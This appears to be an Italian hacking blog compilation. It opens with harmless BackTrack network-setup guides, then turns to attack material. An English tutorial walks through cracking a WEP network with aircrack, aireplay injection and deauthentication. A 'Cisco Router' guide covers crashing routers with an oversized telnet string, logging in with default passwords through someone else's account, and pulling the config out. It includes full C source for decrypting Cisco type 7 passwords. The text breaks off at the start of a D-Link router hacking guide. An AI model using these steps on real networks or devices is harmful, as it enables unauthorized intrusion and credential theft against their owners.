Configurare le periferiche LAN/WiFi sulla BackTrack

In seguito ad un richiesta di un’user del forum, Icecool si è messo al lavoro e in un solo giorno ci ha regalato questa
dettagliata guida per impostare in maniera permanente i parametri di connessione lan o wifi sulla nostra amata
Back|Track2. vi rimando alla lettura completa dell’articolo, ricordandovi il nostro ottimo Forum thanks icecool!
Come configurare una connessione ad un Access Point con la nostra scheda di rete su BT2 in maniera permanente .
Ciao a tutti , allora partiamo dal presupposto che abbiate BT2 installato sull’Hd , puoi configurare la tua scheda di rete
per usarla su un Network ( fattibile anche su BT2 installato su PenDrive ). Si puo fare anche sè usi una distro live ma
dovrai riconfigurare il tutto ad ogni riavvio , ci sono molti modi per configurare una scheda ma quello che vedremo quì e
quello più comune per tutte le distro .
Per accedere alla tua scheda ethernet (LAN):
ifconfig eth0 up
eth0 è il nome della scheda , questo può però essere diverso a seconda dell’ hardware che hai installato .
Per avere una lista delle schede digita :
ifconfig -a
In questo modo potrai vedere tutte le schede (-a) .
Per avere assegnato un indirizzo automatico DHCP dal DHCP server:
dhcpcd eth0
Questo funzionerà solo sè è presente un unica scheda e la tua scheda è eth0 o qualsiasi essa sia , sè nò configurerà tutte
le schede compatibili presenti allo stesso modo .
NOTA: Auditor ha uno script chiamato ‘pump’ che genera lo stesso processo .
Ora controlla sè hai un indirizzo ip:
ifconfig eth0
Dovresti vedere un indirizzo ip , da qualche parte .
Sè vuoi impostare un ip statico al posto di uno dinamico :
ifconfig eth0 192.168.1.2
O qualunque ip tu voglia ! Sè vuoi una subnet mask diversa :
ifconfig eth0 192.168.1.2 netmask 255.255.255.224
Adesso associamo la scheda all’ ip default gateway:
route add default gw 192.168.1.1 eth0
Naturalmente l’ip del Access Point deve essere quello giusto , così come specificare la scheda non è sempre necessario
.
Assegnare manualmente il DNS servers:
echo nomeserver 192.168.1.1 > /etc/resolv.conf
echo nomeserver 212.135.1.36 >> /etc/resolv.conf
Nota il primo comando riscriverà (>) il resolv.conf file, il secondo comando attaccherà (>>) ‘nomeserver 212.135.1.36’ alla
fine dello stesso!
Tutto questo come già detto potrebbe essere fatto automaticamente con DHCP comunque, verificalo:
cat /etc/resolv.conf
..:: http://www.WiFi-ita.com – La prima Community Italiana sul WiFi! ::..
http://www.wifi-ita.com Realizzata con Joomla! Generata: 12 May, 2009, 19:39
Questo comando ti fà vedere il contenuto di /etc/resolv.conf file.
Per cambiare il tuo indirizzo ip DHCP sè è stato già assegnato ad un’altra scheda , devi cancellare il DHCP file assegnato
alla scheda:
rm /etc/dhcpc/dhcpcd-eth0.pid
Attravesro questo potrai fare dei cambiamenti di impostazioni base sulla tua scheda !
Schede Wireless.
Le schede wireless sono molto differenti tra loro a seconda del chipset che hanno e non tutte si prestano a tutti i tipi di
attacco .
Adesso andremo a vedere i comandi generici per settare e configurare un’interfaccia wireless .
Usiamo un termine generico per la nostra interfaccia , nel nostro caso eth0 anche sè potremo trovarla con un nome
diverso a seconda del chipset che monta , di seguito una lista di possibili interfacce che possiamo trovare :
ath0
wlan0
wifi0
eth0
Abbiamo bisogno di capire quale è la nostra e quindi inviamo il seguente comando :
iwconfig -a
Questo ci fara vedere tutte le interfacce presenti nel nostro pc ma solo quelle wireless avranno al loro seguito delle
informazioni dettagliate .
” Accendiamo la nostra interfaccia :
ifconfig eth0 up
Come connettersi ad un Acces Point ‘open’ wireless access point (Access Point):
iwconfig eth0 essid ‘nomenetwork’
Il ‘nomenetwork’ è il tuo Service Set IDentifer (SSID).
Per configurare una chiave Wep :
iwconfig eth0 key 3B5D3C7D207E37DCEEEDD301E3 ( chiave scritta a caso , ognuno metterà la chiave wep giusta
naturalmente )
Per connettersi ad un Acces Point :
iwconfig eth0 Access Point ff:ff:ff:ff:ff:ff
Dove ‘ff:ff:ff:ff:ff:ff’ è il MAC address dell’ Access Point, meglio conosciuto come Basic Service Set IDentifier (BSSID).
Una volta settata la connessione , puoi avere il tuo DHCP address:
dhcpcd eth0
Quindi puoi verificare sè ti viene attribuita un Ip dal wireless network.
Cosa facciamo invece sè il nostro network utilizza il WPA ?
Dobbiamo riassegnare l’ ESSID e il MAC dell’ Access Point , Quindi :
Creiamo un file di testo chiamandolo wpa_supplicant.conf , tutto quello che segue dovrà essere scritto all’interno del file di
testo così com’è , oppure un copia incolla , onde evitare errori di battitura , abbiamo due possibili opzioni :
..:: http://www.WiFi-ita.com – La prima Community Italiana sul WiFi! ::..
http://www.wifi-ita.com Realizzata con Joomla! Generata: 12 May, 2009, 19:39
Questa è la prima :
network={
essid=”nomenetwork”
key_mgmt=WPA-PSK
proto=WPA
pairwise=TKIP
group=TKIP
psk=”WPApassphrase”
}
Dove il nomenetwork è il tuo essid e psk è la tua chiave WPA pre-shared key!
Questa è la seconda : PERMANENTE !
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
eapol_version=1
# ap_scan=2 was the one for me you may try 0 or 1 indstead of 2
ap_scan=2
fast_reauth=1
network={
ssid=”NimeNetwork”
proto=WPA
key_mgmt=WPA-PSK
pairwise=TKIP
group=TKIP
psk=”Chiave”
}
Quindi lanciamo il wpa_supplicant tool.
wpa_supplicant -D madwifi -i eth0 -c wpa_supplicant.conf
Questa stringa necessita di alcune piccole modifiche a seconda del chipset della scheda usata in questo caso il
comando è per un chipset Atheros.
Questi comando che seguono ci danno la possibilita di salvare all’interno del nostro BT2 l’autenticazione alla rete WPA
quindi procediamo come segue : ( PERMANENTE )
Copia il file di testo wpa_supplicant.conf appena creato in /etc directory ,
nella stessa directory c’è una cartella chiamata dhcpc , la locazione è la medesima , /etc/dhcpc folder e CANCELLATE
TUTTO !
Ora mandiamo questi comandi :
bt ~ # chmod 777 /etc/wpa_supplicant.conf
bt ~ # wpa_supplicant -w -Dwext -eth0 -c/etc/wpa_supplicant.conf
Adesso dovremo vedere qualcosa tipo :
bt ~ # wpa_supplicant -w -Dwext -eth0 -c/etc/wpa_supplicant.conf
Trying to associate with SSID ‘NomeNetwork’
Associated with FF:FF:FF:FF:FF:FF
WPA: Key negotiation completed with FF:FF:FF:FF:FF:FF [PTK=TKIP GTK=TKIP]
CTRL-EVENT-CONNECTED – Connection to FF:FF:FF:FF:FF:FF completed (auth) [id=0 id_str=]
Digitiamo poi di seguito :
dhcpcd eth0 ( o qualsiasi sia la tua scheda )
Dovremo vedere un “pop-up” da qualche parte nel monitor che ci dice “KDE Network Monitoring…Connection
Established!”
..:: http://www.WiFi-ita.com – La prima Community Italiana sul WiFi! ::..
http://www.wifi-ita.com Realizzata con Joomla! Generata: 12 May, 2009, 19:39
Possiamo anche usare l’opzione -b nella stringa :
bt ~ # wpa_supplicant -w -Dwext -eth0 -c/etc/wpa_supplicant.conf
Che diventerà :
bt ~ # wpa_supplicant -w -Dwext -iath0 -B -c/etc/wpa_supplicant.conf
Il programma lavorerà in background e quindi avremo una risposta immediata dalla shell tipo :
bt ~ #
nonostante il programma stia ancora lavorando
Mettere la scheda in monitor mode:
iwconfig eth0 mode monitor
Per assegnargli un canale di connessione specifico :
iwconfig eth0 channel XX
Qualche volta sempre a seconda del chipset è possibile che assegnando un canale di una cifra si venga dirottati
automaticamente sul canale 11 .

Guida in inglese

Network Interfaces

So you have Backtrack running installed on a HDD, you can now configure your cards to use the network. You can also do this exactly the same if you are running the distro from the CD, but your settings will not be saved as the CD is a read only medium. There are plenty of different ways to configure these wired cards and plenty of tools to do it. What I am showing here is the generic Linux commands which should be the same for other distro’s.

To turn on your ethernet network card (LAN):

ifconfig eth0 up

The eth0 is the name of the card, this could change depending on what hardware you have installed. To get a list of all adapters: ifconfig -a

This will list all (-a) interfaces.

To get DHCP to assign a network address automatically from the DHCP server:

dhcpcd eth0

This will run it only on eth0, if you omitted the interface you would run the DHCP discovery process on all compatible cards.

Then check if you have an address:

ifconfig eth0

You should see an IP address in there somewhere.

If you want a static IP address instead of a dynamic one:

ifconfig eth0 192.168.1.2

Or whatever IP you want! If you want a variable subnet mask (beyond the scope of this thread!):

ifconfig eth0 192.168.1.2 netmask 255.255.255.224

To manually add a default gateway:

route add default gw 192.168.1.1 eth0

Of course you would replace the IP address with your default gateways, also the eth0 interface is not always needed!

To manually assign your DNS servers:

echo nameserver 192.168.1.1 > /etc/resolv.conf echo nameserver 212.135.1.36 >> /etc/resolv.conf

Note that the first line will OVERWRITE (>) the resolv.conf file, the second command will APPEND (>>) ‘nameserver 212.135.1.36’ onto the end of it!

All of this may have been done for you automatically with DHCP anyway, so to check:

cat /etc/resolv.conf

This will display to you the contents of the /etc/resolv.conf file.

To change your DHCP address if it has already been assigned you need to delete the DHCP file assigned to the card:

rm /etc/dhcpc/dhcpcd-eth0.pid

Although that may change based on the interfaces you have!

Then run the dhcpcd command again.

Howto: How to configure your Network Card

WIRELESS CARDS

Wireless cards.

Wireless cards are very different based upon what chipset you have. I personally use Atheros chipset cards which has screwed me up a bit with BackTrack as it has problems with using them for certain attacks.

What I will again show is generic commands for setting up and configuring your wireless interfaces.

The interface name (ath0 below) is entirely dependant on what chipset you are using, you may have any of the following:

ath0 wlan0 wifi0 eth0

You need to find out what you have. To do this you should execute the following bash command:

iwconfig -a

This will show all wireless extension on your machine. You should see all of your network interfaces, but only the wireless ones will have detailed information next to it. Now you know what your wireless cards name is…

Switch on your wireless card:

ifconfig ath0 up

To connect to an ‘open’ wireless access point (AP):

iwconfig ath0 essid ‘nameofnetwork’

The ‘nameofnetwork’ is your Service Set IDentifer (SSID). That is the name of your network.

To configure a WEP key:

iwconfig ath0 key 3B5D3C7D207E37DCEEEDD301E3

To connect to a specific AP:

iwconfig ath0 ap 03:27:A8:BC:0F:F1

Where ’03:27:A8:BC:0F:F1′ is the MAC address of your AP, also known as the Basic Service Set IDentifier (BSSID).

Once you have setup your connection, you can get a DHCP address:

dhcpcd ath0

Then check that you have an IP from the wireless network.

To Configure a WPA key:

But what if the network uses WPA? Again you need to assign the essid and maybe an AP MAC, then:

Create a text based file called wpa_supplicant.conf

Enter the following:

“”network={ ssid=”nameofnetwork” key_mgmt=WPA-PSK proto=WPA pairwise=TKIP group=TKIP psk=”WPApassphrase” }

Where nameofnetwork is your ssid and psk is your WPA pre-shared key!

Then run the wpa_supplicant tool.

wpa_supplicant -D madwifi -i ath0 -c wpa_supplicant.conf

This will need altering depending on what chipset and drivers you are using. The above should work for an Atheros card.

Saying all of the above about WPA configurations, I have had many problems with it on BackTrack. If someone else has other suggestions, please post here. Also, please post setup commands for other types of wireless cards.

Alternate Method for WPA key use:

As a pre-thought I have a Dell wireless adapter that uses a Broadcom chipset. I’m using BT2 Final on a USB key.

Create the text based file called wpa_supplicant.conf

Enter the Following: network={

ssid=”nameofnetwork”
key_mgmt=WPA-PSK
psk=”passkey”

}

where nameofnetwork is the ssid of your network, and passkey is your password.

Make sure your wireless adapter is enabled, and assign your IP, etc addresses if needed. Then run wpa_supplicant. You don’t need to assign an essid or MAC AP to your wireless adaptor.

I used wpa_supplicant -ieth0 -cwpa_supplicant.conf -B

Again, replace eth0 with your wireless adapter. If you run iwconfig you should see a key associated with your adapter card.

If you didn’t assign any static addresses run your dhcpcd.

dhcpcd eth0

This should have you on the internet in no time. 🙂

All in all, it turned out with the previous method I was providing too much information at specific points, and that just dumbing down the commands I used made it work consistently. Hopefully, if you’ve been having problems, this helps.

To put your wireless card into monitor mode:

iwconfig ath0 mode monitor

To restrict it to one specific channel:

iwconfig ath0 channel XX

Make sure you use a two figure number, channel 1 tends to put you on channel 11 for some reason!

Again, they are for Atheros cards, other cards have other commands.

I hope this has helped people in understanding a little more about the configuration settings for their wireless cards. Don’t forget the wlassisstant tool on BackTrack too.

Originally posted by Xatar @ http://forums.remote-exploit.org/showthread.php?t=1489

I migliori tool di sicurezza informatica!!!!

Una lista completa ed aggiornata sui migliori tools in circolazione utilizzata per scopi di sicurezza informatica è disponibile a questo indirizzo: link.
Il sito in questione è sviluppato dal team di Insecure.org coordinati da Fyodor, cioè il creatore e attuale responsabile del tool per eccellenza di scansione per le reti ossia “nmap”. A questo indirizzo possiamo trovare una molteplicità di categorie che compongono la sicurezza informatica. Ad esempio: password crackers, sniffers, vulnerability scanners, web scanners, exploitation e altri…
Se siete interessati all’argomento sicurezza informatica è vivamente consigliato che visitiate questo sito poichè potrete conoscere tools di cui non avevate mai sentito parlare oppure potete sapere se un tool di vostra conoscenza è davvero buono e se ce ne sono altri migliori. Tutti i tools sono organizzati secondo una classifica in cui sono presenti sia quelli di tipo commerciale che quelli di tipo open source, inutile dire che la classifica è stilata dalla gente più qualificata del settore. a presto!!!

High Quality! WEP Cracking with Ubuntu Aircrack-ng tutorial

Eccovi un bel video!!!

Buon divertimento!!! Cosa ne pensate??

Cracking WEP with Ubuntu (Actually Works)

Cracking WEP with Ubuntu (Actually Works)

This post should enable anyone to get Linux up and running and crack a WEP key. It took me about 2 days and myriad tutorials to finally get this to work, and now that I have I feel that I should share it with everyone. I am by no means a Linux expert, but this works regardless. All you need is a old laptop with a wireless card and a copy of Ubuntu Linux, currently one of the most popular and easily installed distributions of linux. If you haven’t already bought a wireless card, you should select one from this list to save yourself some trouble.

First step, obviously, is to install Ubuntu. Just boot from the CD and follow the directions. This should be fairly straightforward and I’m not going to get into it any more than this. Once you have it installed and the layout and theme is how you want it, go on. But do everything in order, because otherwise it won’t really work.

Next step is to install the extra repositories and all the programs that Ubuntu doesn’t preinstall. Make sure your box can connect to the internet. If you can only connect via wireless and are having problems, there is a package called Wi-Fi radar that is helpful. To install the extra repositories, open a terminal window and type the following:

sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup
sudo gedit /etc/apt/sources.list

While in the editor, replace everything with:

## Add comments (##) in front of any line to remove it from being checked.
## Use the following sources.list at your own risk.
deb http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper main restricted universe multiverse

## MAJOR BUG FIX UPDATES produced after the final release
deb http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-updates main restricted universe multiverse

## UBUNTU SECURITY UPDATES
deb http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse
deb-src http://security.ubuntu.com/ubuntu dapper-security main restricted universe multiverse

## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu dapper-backports main restricted universe multiverse

## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://packages.freecontrib.org/ubuntu/plf dapper free non-free
deb-src http://packages.freecontrib.org/ubuntu/plf dapper free non-free

Save the file and exit the text editor. Next type the command:

sudo apt-get update

Now we have to install the packages we’ll need later on:

sudo apt-get install build-essential
sudo apt-get install aircrack
sudo apt-get install kismet
sudo apt-get install airsnort
sudo apt-get install linux-source
sudo apt-get install linux-headers
sudo apt-get install sharutils

Next, you should update your entire system by going to the System Menu>Administration>Update Manager. Click ‘Check’ and begin installing updates. Then reboot your system. After this is done, it’s time to patch the Madwifi drivers.

This is where everything can be tricky. My wireless card (Linksys WPC55AG) uses the Atheros driver, which I needed to patch. If you have a different driver, you’re going to need to find out whether or not you need to patch your drivers, or if they’ll even work with the Aircrack suite. The forums at aircrack-ng.org are a good place to look and so is a google search. If you have an Atheros card, it will be called ath0 when you type iwconfig in the terminal window, or there will be a line that says Ethernet controller: Atheros Communications… when you type lspci in the terminal.

Let’s apply the madwifi patch which you’ll need if you’re using the Atheros driver. This will temporarily disable your wireless card when it deletes the old drivers of the disk. First we’re going to navigate to the /usr/src directory, download the new drivers, delete the old drivers, then install the new ones and apply the patch. You can just copy and paste the commands below into the terminal or type them yourself.

sudo -i

cd /usr/src
wget http://syserr.com/stuff/madwifi-cvs-20051025.tar.gz
wget http://syserr.com/stuff/madwifi-cvs-20051025.patch

ifconfig ath0 down
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name ‘ath*’ -exec rm -v {} \;
find /lib/modules -name ‘wlan*’ -exec rm -v {} \;

tar zxvf madwifi-cvs-20051025.tar.gz
cd madwifi
patch -Np1 -i ../madwifi-cvs-20051025.patch
make && make install

modprobe ath_pci

UPDATE: Some people have been having problems with the modprobe command. A comment below contains a fix in some cases:

However, during Madwifi Installation I got this warning:

Warning: could not find /usr/src/madwifi/ath_hal/.hal.o.cmd for /usr/src/madwifi/ath_hal/hal.o

This warning can be IGNORED.

When I ran “modprobe ath_pci” it gave me an error message and “dmesg” gave me some gibberish about “disagrees about version of symbol”.

I browsed the web and found the solution: You have to delete the linux-restricted modules. Just search for “linux-restricted” in Synaptic. I removed everything but “linux-restricted-modules-common”. Then I compiled the madwifi again and ran “modeprobe ath_pci” again. NO ERROR this time! Authenticating and injecting works!

Karl, maybe you can add this to your tutorial cuz I did everything exactly as you wrote. Apparently some network cards with atheros chipset cause problems if you don’t remove the linux-restricdet-modules.

Thanks again!

Cheers,

mcgyver100

If you are using the Atheros driver, next we need to configure kismet to use the right source. If you are using another driver you’ll have to look up what syntax you use. First navigate to the Kismet config, then change the source line.

sudo gedit /etc/kismet/kismet.conf

Change the line that begins with ’source=’ to ’source=madwifi_ag,ath0,madwifi’. Now reboot the computer. After it boots back up you should be able to access the internet again via your wireless card.

Now we can begin cracking. Open up a terminal window, enter monitor mode, and run kismet.

sudo airmon start ath0
sudo kismet

Locate the wireless network you want to crack, and note its ESSID and channel. Then exit by pressing Ctrl-C.

Next, run airodump.

sudo airodump ath0 filename channel# 1

The one at the end lets Airodump know we only want to capture IV’s. The filename can be anything you want, and will be saved in your home directory (or whatever directory you run the command from) as filename.ivs.

Copy the bssid of the wireless network from the airodump window by selecting it and pressing Shift+Ctrl+C. Open up a new terminal window so we can run aireplay to start injecting packets so our data count goes up. We want the data column in airodump to reach between 100,000 and 400,000. The more packets we have, the faster aircrack can find the WEP key. If the WEP key is 128 bits, we may need up to 1,000,000 packets.

sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0

This should associate the network with the wireless connection. If it times out repeatedly, you need to be closer to the wireless router or change your interface rate by typing ’sudo iwconfig ath0 rate 1M’.

Next we want to start injecting packets.

sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0

At first, it will only read packets, and say 0 ARP requests and 0 packets sent. Just wait a minute or two and it will start sending packets in large quantities. If it returns text that says it has been deauthorized, press Ctrl+C and run the command again. You can try to speed things up by entering this command:

sudo aireplay -0 ath0 -a BSSID ath0

Otherwise just sit back and wait. As soon as packets begin to be sent, the data field in Airodump should start flying. Wait until the desired number of packets have been recieved, then open a new terminal window and run aircrack.

sudo aircrack filename.ivs

After a minute, aircrack should return the WEP key. If it doesn’t, collect more packets.

This is by no means exhaustive, but this is what worked for me. If you have questions feel free to ask me and I’ll try to help as best I can, however, like I said before I’m no Linux guru, and have only been using it for a short time. I hope this works for everybody. If you have any changes let me know.
Share:These icons link to social bookmarking sites where readers can share and discover new web pages.

Fonte: clikka qui

Cisco Router

Scritto da Spy
* Perchè Hackerare un router Cisco ?

* Come trovare un router Cisco…

* Come bucare … (beh l’avete capito)

* Cracckare le Password


SpiDeR2K : The Resurrection

E Finalmente rieccomi a scrivere testi per il TankCommandos, dopo un periodo di incasinamenti scolastici
e sportivi, ho trovato uno spiraglio di tempo per dedicarmi all’hacking e alla nostra imbattibile ( ??? )
Crew…
Prima di iniziare a trattare l’argomento volevo precisare che nello scrivere questo articolo, ho preso
spunto da un testo ( in inglese ) di Blacksun ( blacksun.box.sk ), quindi non mi rompete le palle dicendo
che ho scopiazzato , per due motivi : 1° scrivendo questo articolo faccio un favore a voi interessati ,
2° Non ho copiato tutto ma ho espanso l’argomento anche attraverso altre info reperite in rete.
Bene dopo tutto questo mucchio di stronzate, andiamo a noi.. 🙂


———————————————–
Sezione 1 : Perche hackerare un router CISCO ?
———————————————–

Ci starai certo pensando… perchè hackerare un router ?

Beh la ragione che credo , sia la più generica , è hackerare un router per riutilizzarlo
successivamente , in un’altro attacco magari ad un server più grosso e complesso..

I ruoter Cisco sono molto veloci , alcuni anche con connessioni T1 ( a velocità stellari )
sono molto flessibili e possono essere utilizzati in degli attacchi DoS ( Denial of Service )
indirizzati ad altri sistemi , per avere dei risultati devastanti sul Target.

Beh se sapete cos’è un router , saprete anche che all’interno di questi , vi viaggiano
centinaia e centinaia di pacchetti che vengono instradati in altri server nella grande rete..
Questi , se avete una buona conoscenza dei router, potreste anche provare ad intercettare
qualche pacchetto importante , e poi decodificarlo , per ottenere informazioni importanti,
su altri sistemi…

——————————————-
Sezione 2 : Come trovare un ruoter Cisco ?
——————————————-

Al contrario di quanto potrebbe sembrare, trovare un ruoter Cisco è una cosa abbastanza
semplice, quasi tutti gli ISP ( Internet Service Provider ) instradano i propri pacchetti
con uno di questi.
Il modo più facile di trovare un router Cisco è usare traceroute da Linux o Dos ( per
il DOS scrivete ” tracert ” e l’indirizzo IP ) e , come spero sappiate, avrete una lista
di tutti i computer con i corrispondenti indirizzi IP , collegati al nostro Target.
Uno di questi sistemi , avrà probabilmente un nome tipo ” router ” , ” Cisco ” , ” Cisco router “, ecc..
Ecco un esempio di come potrebbe risultarvi un traceroute con Router :

tracert 222.222.22.22

Tracing route to [221.223.24.54]
over a maximum of 30 hops.
1 147ms 122ms 132ms your.isp [222.222.22.21]
2 122ms 143ms 123ms isp.firewall [222.222.22.20]
3 156ms 142MS 122ms aol.com [207.22.44.33]
4 * * * Request timed out
5 101ms 102ms 133ms cisco.router [194.33.44.33]
6 233ms 143ms 102ms something.ip [111.11.11.11]
7 222ms 123ms 213ms netcom.com [122.11.21.21]
8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]
9 122ms 223ms 243ms altavista.34.com [121.22.32.43] <<< target’s isp
10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54]
Trace complete.

Quel “cisco.router” sulla 5° riga è il nostro obbiettivo..
Adesso abbiamo l’indirizzo di un Cisco Router, ma nell’ 80 % dei casi questo sarà protetti
da un qualche firewall, per verificare la presenza di quest’ultimo , fate più
volte un ping, se vedete che vi restituisce una risposta e quindi il ping è andato a buon
fine, il ruoter non è bloccato da firewall.

Un’altro modo , è quello di vedere se il ruoter ha delle porte in listening ( per i più
cerebrolesi :-))) , se ha delle porte aperte ), e quindi provare a connettersi con
un client Telnet e vedere di raccogliere qualche info utile.

Cmq… in questo testo non vi sto mica a spiegare come violare un FireWall,
cercate di trovare un router non protetto !


—————————————-
Sezione 3 : Come bucare un Cisco Router ( che poi è la parte che piu vi interessa.. hihi )
—————————————-

La maggior parte dei Router Cisco utilizzano il cosidetto “V4.1 software”…

xxx : << I ROUTER OHHHHHH : MISSION IMPOSSIBILE !! >>

Ma che !!! Se il router non è protetto è un gioco da ragazzi hackerarlo.. hihihi
Poco fà ho accennato alle porte di un router.. facendo un bel Port-scanning al nostro
IP fortunato, sicuramente troveremo la porta 23 in ascolto, utilizzando un bel proxy
o preferibilmente un account che non sia nostro, connettiamoci a questa con Telnet e
inseriamo una stringa enorme del genere alla/e prima/e richiesta/e:

asdsdajkhdjkashdhlkahshjashdjhajklhdjklh2k41273489172937491347891kjahdk
9371927390812ghcyhiqgdab#@@@12312koeiueu189ue891789er719mjcrj289fu891rf
189un3cu982c89uhr89ny2c78ty2fn8937yvtnhuh5g0y89475t8’14ur’0182903r891yn
asdasfnvr89gnuv8372u3v5068035986ì’bk9hìulou6èkolmèuklmkpioyoyuloyukasd12
1418321989859034890j891g5896k590g6k85906k81908’fnmutnrinhtqchweuioqrmwd
asdsdajkhdjkashdhlkahshjashdjhajklhdjklh2k41273489172937491347891kjahdk
9371927390812ghcyhiqgdab#@@@12312koeiueu189ue891789er719mjcrj289fu891rf
189un3cu982c89uhr89ny2c78ty2fn8937yvtnhuh5g0y89475t8’14ur’0182903r891yn
asdasfnvr89gnuv8372u3v5068035986ì’bk9hìulou6èkolmèuklmkpioyoyuloyukasd12
1418321989859034890j891g5896k590g6k85906k81908’fnmutnrinhtqchweuioqrmwd

Adesso.. i casi che si potrebbero verificare sono due :

1) Il router va offline ma si riavvia automaticamente :
In tal caso possiamo provare ad hackerarlo attraverso un ping of death moolto pesante,
per cercare di buttarlo giù.

2) Riusciamo con una botta di Culo ( e specifico con la C maiscuola ) a freezzare il
ruoter per un periodo di 5 – 10 min.
In questo caso dobbiamo agire in maniera rapida e concisa…
Apriamo una seconda sezione Telnet sul server ( possibilmente passiamo per
qualche Wingate ) e inseriamo la password “admin” o “root”, il motivo è che
queste sono le password di default di un router Cisco, se tutto è andato liscio
sarete loggati nel sistema. BINGO Siamo Dentro !

Prima di andare avanti facciamo qualche piccola osservazione :

Un ruoter non è mica una SHELL ! Ovvero , di certo non potremo utilizzare tutti i
comandi Unix , poichè il router ha dei propri comandi particolari per compiere determinate
operazioni ; quindi teoricamente prima di tentare un attacco del genere , dovremo almeno
conoscere qualche fondamentale dei router. Nella più districata delle soluzioni , una
volta al prompt del router, digitiamo “?” , e dovremo trovarci dinanzi a noi una lista
di comandi utili.

Torniamo al nostro tutorial… siamo dentro il router, la cosa che più ci interessa è
ottenere il file delle password che poi crakkeremo ( i verbi non sono il mio forte… )
con il nostro Jhon the Ripper. La trasmissione da un router deve essere eseguita ( sempre
utilizzando i comandi del router ), anche attraverso il nostro HyperTerminal di Windows
che si trova nella directory Accessori/Comunicazioni del Menù Avvio.

Avviando il programma , inseriamo il nome della sessione , e selezioniamo in basso
” TCP/IP Winsock ” , inserendo come porta la 23 e mettendoci in ascolto di chiamata..
chiamata che faremo eseguire dall’interno del router verso il nostro computer.
Una volta conclusa la transazione , facciamo logout e chiudiamo la connessione.
Praticamente la parte più difficile è andata…

Sezione 4 : Cracckare il file delle Password

E si ! ho fatto anche questa sezione poichè oltre ai normali modi utilizzabili
per cracckare le password ( jhon the Ripper, Brute force , ecc.. ) ho trovato
anche un sorgente C , da compilare con linux , che ci potrebbe facilitare il tutto.

Vi faccio un Copia&Incolla del sorgente proprio qui sotto.. oggi sono anche piu buono di
Babbo Natale .. eh ehm…


——— INIZIO ———–

#include <stdio.h>
#include <ctype.h>

char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};

char pw_str1[] = “password 7 “;
char pw_str2[] = “enable-password 7 “;

char *pname;

cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;

if(strlen(enc_pw) & 1)
return(-1);

seed = (enc_pw[0] – ‘0’) * 10 + enc_pw[1] – ‘0’;

if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);

for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 – 2] = val ^ xlat[seed++];
val = 0;
}

val *= 16;

if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
val += enc_pw[i] – ‘0’;
continue;
}

if(enc_pw[i] >= ‘A’ && enc_pw[i] <= ‘F’) {
val += enc_pw[i] – ‘A’ + 10;
continue;
}

if(strlen(enc_pw) != i)
return(-1);
}

dec_pw[++i / 2] = 0;

return(0);
}

usage()
{
fprintf(stdout, “Usage: %s -p <encrypted password>\n”, pname);
fprintf(stdout, ” %s <router config file> <output file>\n”, pname);

return(0);
}

main(argc,argv)
int argc;
char **argv;

{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;

pname = argv[0];

if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}

if(argv[1][0] == ‘-‘)
{
switch(argv[1][1]) {
case ‘h’:
usage();
break;

case ‘p’:
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, “Error.\n”);
exit(1);
}
fprintf(stdout, “password: %s\n”, passwd);
break;

default:
fprintf(stderr, “%s: unknow option.”, pname);
}

return(0);
}

if((in = fopen(argv[1], “rt”)) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], “wt”)) == NULL)
exit(1);
}

while(1) {
for(i = 0; i < 256; i++) {
if((line[i] = fgetc(in)) == EOF) {
if(i)
break;

fclose(in);
fclose(out);
return(0);
}
if(line[i] == ‘\r’)
i–;

if(line[i] == ‘\n’)
break;
}
pw_pos = 0;
line[i] = 0;

if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);

if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);

if(!pw_pos) {
fprintf(stdout, “%s\n”, line);
continue;
}

if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, “Error.\n”);
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, “%s”, pw_str1);
else
fprintf(out, “%s”, pw_str2);

fprintf(out, “%s\n”, passwd);
}
}
}


——— FINE ———–by OutBlaze

E con questo mi sembra di aver esaurito l’argomento , almeno per quanto mi riguarda..
Come faccio usualmente vi invito a non combinare casini e a non tentare roba del genere se non avete
una conoscenza più che di base di quello che veramente volete fare…
Quindi .. leggere e studiare , prima di agire !

Bucare un router

=Kn|GhT CReW Corp. 2005/07=-
[-=The Legacy Of HeLL=-]

————————————————————-
GUIDA A COME HACKERARE UN ROUTER D-LINK,ZYXEL V.1.0
————————————————————-
AUTORE: Dj`LoRdZ`
ANNO DI PRODUZIONE: 2005
STATO CIVILE: PROGRAMMATORE,Dj dal venerdi al sabato direttamente da like tv e 1926:)
MUSICA DI SOTTO FONDO: I MISS YOU ( Blink 182 )
SERVER IRCNET: irc.tin.it

TOOLS E STRUMENTI VARI >>>>

-TOOLS DA AVERE
